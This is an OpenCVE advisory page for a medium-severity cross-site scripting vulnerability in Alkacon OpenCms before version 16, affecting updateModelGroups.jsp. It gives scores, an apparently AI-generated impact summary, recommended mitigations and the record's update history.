Description
A Cross Site Scripting vulnerability in Alkacon OpenCms before 16 exists via updateModelGroups.jsp.
Published: 2026-05-08
Score: 6.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Based on the description, it is inferred that a flaw in the updateModelGroups.jsp page of Alkacon OpenCms allows an attacker to inject arbitrary client‑side script code into pages rendered to other users. This vulnerability can lead to session hijacking, credential theft, or the execution of malicious actions within a victim’s browser context. Based on the description, it is inferred that the weakness lies in insufficient filtering of user‑controlled input before it is displayed, a classic Cross‑Site Scripting problem.

Affected Systems

Alkacon OpenCms versions released prior to 16 are affected. Based on the description, it is inferred that no specific patch version is reported in the advisory, so any deployment of OpenCms before the 16 release should be treated as vulnerable.

Risk and Exploitability

The CVSS score is 6.1, reflecting a medium severity flaw. Based on the description, it is inferred that the flaw allows an attacker to inject arbitrary client‑side script code. The EPSS score is <1%, indicating a low yet nonzero exploitation probability. Based on the description, it is inferred that the vulnerability can be triggered via a web request to the vulnerable page. Because the payload is delivered to browsers, the vector is likely network‑based and can be abused by anyone able to send HTTP requests to the web application. The vulnerability is not listed in CISA’s KEV catalog, suggesting it has not been widely exploited publicly at the time of this analysis.

Generated by OpenCVE AI on May 8, 2026 at 20:01 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Alkacon OpenCms to version 16 or later to eliminate the vulnerable file
  • If an upgrade is not immediately possible, restrict or disable access to updateModelGroups.jsp, limiting it to privileged administrators only
  • Apply server‑side input validation to strip or encode script tags and other executable markup before rendering content
  • Monitor application logs for attempts to access updateModelGroups.jsp or to inject malicious scripts

Generated by OpenCVE AI on May 8, 2026 at 20:01 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-2887-f3v6-6rjf Alkacon OpenCms is vulnerable to XSS via updateModelGroups.jsp
History

Fri, 08 May 2026 20:30:00 +0000

Type Values Removed Values Added
Title Cross‑Site Scripting via updateModelGroups.jsp in Alkacon OpenCms

Fri, 08 May 2026 14:15:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 08 May 2026 06:45:00 +0000

Type Values Removed Values Added
Title Cross‑Site Scripting via updateModelGroups.jsp in Alkacon OpenCms
First Time appeared Alkacon
Alkacon opencms
Weaknesses CWE-79
Vendors & Products Alkacon
Alkacon opencms

Fri, 08 May 2026 05:00:00 +0000

Type Values Removed Values Added
Description A Cross Site Scripting vulnerability in Alkacon OpenCms before 16 exists via updateModelGroups.jsp.
References

Subscriptions

Alkacon Opencms
cve-icon MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-05-08T12:59:37.304Z

Reserved: 2023-09-08T00:00:00.000Z

Link: CVE-2023-42345

cve-icon Vulnrichment

Updated: 2026-05-08T12:59:33.726Z

cve-icon NVD

Status : Deferred

Published: 2026-05-08T05:16:09.703

Modified: 2026-05-08T15:58:49.383

Link: CVE-2023-42345

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-08T20:15:15Z

Weaknesses